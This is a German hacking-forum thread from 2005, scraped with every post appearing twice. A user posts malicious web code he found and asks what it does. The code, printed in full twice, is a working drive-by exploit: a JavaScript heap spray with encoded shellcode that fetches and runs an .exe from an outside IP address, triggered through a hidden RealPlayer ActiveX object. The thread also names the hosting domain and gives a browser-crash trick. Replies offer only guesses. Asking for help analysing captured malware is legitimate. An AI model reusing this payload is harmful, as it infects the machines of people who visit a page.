[HaBo]

Mitch · 11.08.05, 13:47

Hallo,

ich habe hier einen bösartigen Code und würde gerne wissen was der genau macht leider sind meine JS Kentnisse nicht so gut um ihn zu entschlüsseln. Kriegt das wer hin !!

<HTML>
<SCRIPT language="javascript">
food = unescape("%u9090%u9090%u10eb%u4b5b%uc933%ub966%u01 3c%u3480%u990b%ufae2%u05eb%uebe8%uffff%u70ff%u9934 %u9999%u12c3%uaa6b%u3559%u01a4%u9999%uec99%u186f%u 5175%u9999%u1299%u106d%ubdcf%u0c71%u9999%uaa99%u10 42%u669f%uf1af%ud717%u7597%u3471%u9999%u1099%u91df %uf5f1%u99f5%uf199%uf7f6%ufdb7%uecf1%uf5eb%ucdf4%u cf66%u1091%u9ddf%uaf66%ue7f1%u7b41%u71ea%u9911%u99 99%udf10%u6695%uf1af%u6701%u9713%ue071%u9999%u1099 %u8ddf%uaf66%ubcf1%u6629%u715b%u99f3%u9999%udf10%u 6681%u9def%uaff1%ub683%u71e9%u99c3%u9999%udf10%uf3 89%uf1fc%ub7ea%ue1fc%uff10%u6685%u85ef%ucf66%uaa81 %uc850%u66c8%u85ef%uef66%uc8bd%ucf66%uaa89%uc850%u ef66%u6685%u8dcf%ucf66%u7095%u9919%u9999%ucfcc%u38 fd%u99a9%u9999%u591c%u95e1%ud912%u1295%u85e9%u1234 %u91f1%u9072%ud912%u12ad%u2131%u9999%u1299%uc75c%u 5bc4%u999d%uccca%ucecf%uf512%u81bd%udc12%u12a5%u9c cd%u9ae1%u124c%u81d3%uc312%u9ab9%u7a44%ud0ab%uad12 %u9a12%uaa6c%u6566%u59aa%ua335%ued5d%u589e%u9456%u 619a%u6b72%ue5a2%u8dbd%u78ec%uc312%u9abd%uff44%u95 12%u12d2%u85c3%u449a%u9d12%u9a12%u725c%uaa9b%u1259 %uc64c%uc4c7%u5bc2%u999d%u5071%u6667%u6866%u7474%u 3a70%u2f2f%u3132%u2e39%u3331%u2e36%u3532%u2e32%u33 31%u2f33%u696a%u6f61%u652e%u6578%u0098");
dish = unescape("%u0D0D%u0D0D");headersize = 20;
lobster = headersize+food.length
while (dish.length<lobster) dish+=dish;
shrimp = dish.substring(0, lobster);
raven = dish.substring(0, dish.length-lobster);
while(raven.length+lobster<0x40000) raven = raven+raven+shrimp;
cat = new Array();
i=0;while(++i<500){cat[i] = raven + food;}
</SCRIPT>
<div style="display:none">
<object classid="clsid:cfcdaa03-8be4-11cf-b84b-0020afbbccfa" width="256" height="64">
<param name="_extentx" value="1">
<param name="_extenty" value="1">
<param name="autostart" value="1">
<param name="shuffle" value="0">
<param name="prefetch" value="0">
<param name="nolabels" value="0">
<param name="src" value="smile.smil">
<param name="controls" value="controlpanel,statusbar">
<param name="console" value="clip">
<param name="loop" value="1">
<param name="numloop">
<param name="center">
<param name="maintainaspect" value="0">
</object>
</div>
</HTML>

Shame · 12.08.05, 14:28

Wie wäre es mit einfach mal testen?

Anzeige

- Anzeige -

Mitch · 12.08.05, 16:02

naja, mir tut der ja nix. Jedoch würde mich wirklich mal interessieren was dort genau passiert, mal sehen ob es wer hinkriegt.

Für den der es schafft spendier ich auch einen virtuellen Kaffeeeeeee !!

Wenn das mal kein Anreiz ist

*gg*

thx for Help

Mitch

ghostdog · 12.08.05, 16:49

is wahrscheinlich irgendein quatsch diese hex-anweisungen sollen einem angst machen.

Shame · 12.08.05, 17:03

Sehe ich genauso, hab es durch meinen testrechner laufen lassen, und es ist wirklich absolut nichts passiert! ( wie auch mit javascript? )

ghostdog · 12.08.05, 18:34

Zitat:

Original von Shame
Sehe ich genauso, hab es durch meinen testrechner laufen lassen, und es ist wirklich absolut nichts passiert! ( wie auch mit javascript? )

Naja mit Javascript kann man schon bisschen was anrichten. Für den IE reicht ja schon <img src="bullshit.jpg" width=99999999999999 height=999999999999>
probier mal ne html datei mit dem inhalt in IE zu öffnen

12.08.05, 19:13

Zitat:

Naja mit Javascript kann man schon bisschen was anrichten. Für den IE reicht ja schon <img src="bullshit.jpg" width=99999999999999 height=999999999999>

zum einen ist das doch HTML und zum andern ist dieser Bug meineswissens längst behoben. Hab ich mal irgendwo auf diesem Board gelesen.
Ich lass mich aber gern eines besseren belehren....

SUID:root · 12.08.05, 20:34

Diese Zahlenkombinationen ist ein ausführbarer Code,vermutlich eine umgewandelte Exe.
Das Script nutzt irgendeinen Exploit aus.

Mit Hilfe des Exploits wird der Code dann lokal auf dem System ausgeführt.

Zum Angst machen ist das sicher nicht. Wird schon funktionieren, sofern nicht gepacht.

Gruss

root

ghostdog · 12.08.05, 20:55

Zitat:

Original von ThiEfGaRReT

Zitat:

Naja mit Javascript kann man schon bisschen was anrichten. Für den IE reicht ja schon <img src="bullshit.jpg" width=99999999999999 height=999999999999>

zum einen ist das doch HTML und zum andern ist dieser Bug meineswissens längst behoben. Hab ich mal irgendwo auf diesem Board gelesen.
Ich lass mich aber gern eines besseren belehren....

html is ja noch nichma ein code. das sollte bloß zeigen, dass wenn html dazu in der lage ist schäden anzurichten, dann js erst recht weil du viel mehr möglichkeiten hast.

12.08.05, 21:09

Da muss ich dir recht geben!

Shame · 13.08.05, 10:29

Mh.. aber warumm läuft dass dann auf meinem linux testrechner net???? ( is Linux wieder mal im Vorteil? )

SUID:root · 13.08.05, 12:05

Weil der Code für Windows ist.
Weil ne Windows Exe nur unter Windows läuf. (Wenn es ne Exe ist; auf jeden Fall irgendein ausführbarer Code)
Weil Der Bug sehr wahrscheinlich für den IE ist.

Gruss

root

Mitch · 15.08.05, 09:03

Hallo,

danke für die vielen Antworten der Code stammt von der Seite (nicht draufcklicken wer nicht drauf will) wortmann.de.3322.org und mich würde echt interessieren was der da macht er nutzt den Exploit vom IE aus aber er will ja irgendwas bezwecken Daten kopieren Programme installieren etc kommt man da nicht ran ????

Gruss

Mitch

Black · 22.08.05, 18:38

lol hab ne seite mit dem cod geöfnet aber ist ihrgend wie nichts passiert bist sicher das der richtig geschrieben ist?

Mitch · 25.08.05, 10:49

die Adresse lautet wortmann-de.3322.org

sry fore that !!!

Anzeige

- Anzeige -

11.08.05, 13:47	#1 (permalink)
Mitch Registriert seit: 11.08.05 Likes: 0	habe hier einen bösartigen Code Anzeige Hallo, ich habe hier einen bösartigen Code und würde gerne wissen was der genau macht leider sind meine JS Kentnisse nicht so gut um ihn zu entschlüsseln. Kriegt das wer hin !! <HTML> <SCRIPT language="javascript"> food = unescape("%u9090%u9090%u10eb%u4b5b%uc933%ub966%u01 3c%u3480%u990b%ufae2%u05eb%uebe8%uffff%u70ff%u9934 %u9999%u12c3%uaa6b%u3559%u01a4%u9999%uec99%u186f%u 5175%u9999%u1299%u106d%ubdcf%u0c71%u9999%uaa99%u10 42%u669f%uf1af%ud717%u7597%u3471%u9999%u1099%u91df %uf5f1%u99f5%uf199%uf7f6%ufdb7%uecf1%uf5eb%ucdf4%u cf66%u1091%u9ddf%uaf66%ue7f1%u7b41%u71ea%u9911%u99 99%udf10%u6695%uf1af%u6701%u9713%ue071%u9999%u1099 %u8ddf%uaf66%ubcf1%u6629%u715b%u99f3%u9999%udf10%u 6681%u9def%uaff1%ub683%u71e9%u99c3%u9999%udf10%uf3 89%uf1fc%ub7ea%ue1fc%uff10%u6685%u85ef%ucf66%uaa81 %uc850%u66c8%u85ef%uef66%uc8bd%ucf66%uaa89%uc850%u ef66%u6685%u8dcf%ucf66%u7095%u9919%u9999%ucfcc%u38 fd%u99a9%u9999%u591c%u95e1%ud912%u1295%u85e9%u1234 %u91f1%u9072%ud912%u12ad%u2131%u9999%u1299%uc75c%u 5bc4%u999d%uccca%ucecf%uf512%u81bd%udc12%u12a5%u9c cd%u9ae1%u124c%u81d3%uc312%u9ab9%u7a44%ud0ab%uad12 %u9a12%uaa6c%u6566%u59aa%ua335%ued5d%u589e%u9456%u 619a%u6b72%ue5a2%u8dbd%u78ec%uc312%u9abd%uff44%u95 12%u12d2%u85c3%u449a%u9d12%u9a12%u725c%uaa9b%u1259 %uc64c%uc4c7%u5bc2%u999d%u5071%u6667%u6866%u7474%u 3a70%u2f2f%u3132%u2e39%u3331%u2e36%u3532%u2e32%u33 31%u2f33%u696a%u6f61%u652e%u6578%u0098"); dish = unescape("%u0D0D%u0D0D");headersize = 20; lobster = headersize+food.length while (dish.length<lobster) dish+=dish; shrimp = dish.substring(0, lobster); raven = dish.substring(0, dish.length-lobster); while(raven.length+lobster<0x40000) raven = raven+raven+shrimp; cat = new Array(); i=0;while(++i<500){cat[i] = raven + food;} </SCRIPT> <div style="display:none"> <object classid="clsid:cfcdaa03-8be4-11cf-b84b-0020afbbccfa" width="256" height="64"> <param name="_extentx" value="1"> <param name="_extenty" value="1"> <param name="autostart" value="1"> <param name="shuffle" value="0"> <param name="prefetch" value="0"> <param name="nolabels" value="0"> <param name="src" value="smile.smil"> <param name="controls" value="controlpanel,statusbar"> <param name="console" value="clip"> <param name="loop" value="1"> <param name="numloop"> <param name="center"> <param name="maintainaspect" value="0"> </object> </div> </HTML>

12.08.05, 14:28	#2 (permalink)
Shame Registriert seit: 09.07.05 Likes: 0	RE: habe hier einen bösartigen Code Wie wäre es mit einfach mal testen?

12.08.05, 16:02	#3 (permalink)
Mitch Themenstarter Registriert seit: 11.08.05 Likes: 0	RE: habe hier einen bösartigen Code naja, mir tut der ja nix. Jedoch würde mich wirklich mal interessieren was dort genau passiert, mal sehen ob es wer hinkriegt. Für den der es schafft spendier ich auch einen virtuellen Kaffeeeeeee !! Wenn das mal kein Anreiz ist gg thx for Help Mitch

12.08.05, 16:49	#4 (permalink)
ghostdog Senior Member Registriert seit: 18.05.04 Likes: 0	is wahrscheinlich irgendein quatsch diese hex-anweisungen sollen einem angst machen. __________________ Die neuen Desire Z und Desire HD Smartphones

15.08.05, 09:03	#13 (permalink)
Mitch Themenstarter Registriert seit: 11.08.05 Likes: 0	aber was macht der code genau Hallo, danke für die vielen Antworten der Code stammt von der Seite (nicht draufcklicken wer nicht drauf will) wortmann.de.3322.org und mich würde echt interessieren was der da macht er nutzt den Exploit vom IE aus aber er will ja irgendwas bezwecken Daten kopieren Programme installieren etc kommt man da nicht ran ???? Gruss Mitch

12.08.05, 17:03	#5 (permalink)
Shame Registriert seit: 09.07.05 Likes: 0	Sehe ich genauso, hab es durch meinen testrechner laufen lassen, und es ist wirklich absolut nichts passiert! ( wie auch mit javascript? )

12.08.05, 20:34	#8 (permalink)
SUID:root Member of Honour Registriert seit: 04.09.04 Likes: 0	Diese Zahlenkombinationen ist ein ausführbarer Code,vermutlich eine umgewandelte Exe. Das Script nutzt irgendeinen Exploit aus. Mit Hilfe des Exploits wird der Code dann lokal auf dem System ausgeführt. Zum Angst machen ist das sicher nicht. Wird schon funktionieren, sofern nicht gepacht. Gruss root

12.08.05, 21:09	#10 (permalink)
ThiEfGaRReT Guest Likes:	Da muss ich dir recht geben!

13.08.05, 10:29	#11 (permalink)
Shame Registriert seit: 09.07.05 Likes: 0	Mh.. aber warumm läuft dass dann auf meinem linux testrechner net???? ( is Linux wieder mal im Vorteil? )

13.08.05, 12:05	#12 (permalink)
SUID:root Member of Honour Registriert seit: 04.09.04 Likes: 0	Weil der Code für Windows ist. Weil ne Windows Exe nur unter Windows läuf. (Wenn es ne Exe ist; auf jeden Fall irgendein ausführbarer Code) Weil Der Bug sehr wahrscheinlich für den IE ist. Gruss root

22.08.05, 18:38	#14 (permalink)
Black Registriert seit: 30.04.05 Likes: 0	lol hab ne seite mit dem cod geöfnet aber ist ihrgend wie nichts passiert bist sicher das der richtig geschrieben ist?

25.08.05, 10:49	#15 (permalink)
Mitch Themenstarter Registriert seit: 11.08.05 Likes: 0	ui habe mich doch glatt vertippt die Adresse lautet wortmann-de.3322.org sry fore that !!!

Themen-Optionen
Druckbare Version zeigen Jemanden per E-Mail auf dieses Thema hinweisen
Ansicht
Linear-Darstellung Zur Hybrid-Darstellung wechseln Zur Baum-Darstellung wechseln

Ähnliche Themen
Thema	Autor	Forum	Antworten	Letzter Beitrag
EDIT: habe einen noch eine Phyton frage	nasir	Code Kitchen	0	13.11.05 17:31
Wie kann ich einen code wieder öffnen	napoleon	Cryptography & Encryption	4	03.11.05 14:58
wie vor bösartigen scripts in zb. bildern schützen?	Obssesion	(In)security allgemein	3	12.10.05 15:43
Einen Link in Code einbauen - - > Sofort anzeigen!	SiRRiuS	Internet Allgemein	6	13.04.02 17:45

[HaBo]

habe hier einen bösartigen Code